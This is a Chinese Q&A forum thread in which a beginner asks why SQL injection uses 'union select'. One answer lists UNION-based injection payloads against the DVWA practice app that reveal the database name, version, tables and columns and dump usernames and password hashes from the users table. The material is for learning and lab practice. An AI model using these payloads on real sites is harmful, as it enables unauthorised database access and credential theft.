sql注入时,为什么都是id=xx union select。。。呢,为什么要加id和union?初学者求解答
发布网友
发布时间:2022-05-03 11:00
共2个回答
懂视网
时间:2022-05-03 15:22
- 获取数据/信息
-1‘ union select database(),user() #
-1‘ union select version(),@@version_compile_os#
mysql不同版本一些细节也不同
MySQL版本?于4.0时,不?持union select联合查询
MySQL版本?于5.0时,有默认数据库information_schema,保存了 Mysql所有数据库的信息,如库名,表名,字段的名及数据类型与访问权限等。该数据库拥有?个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。
-1‘ union select table_name,table_schema from information_schema.tables where table_schema= ‘dvwa‘#
-1‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘ #
group_concat能将属于users表的列名组合到一行显示
-1‘ union select user,password from users#
sqli-union注入
标签:loading 数据表 前端 start 集合 一个 取数 结果 file
热心网友
时间:2022-05-03 12:30
union是数据合并,前面存在的数据,后面就不需要了,意思是两条语句查询出的数据合并,但不重复。追问id这个晓得了,但为什么要用联合查询呢?分先给你
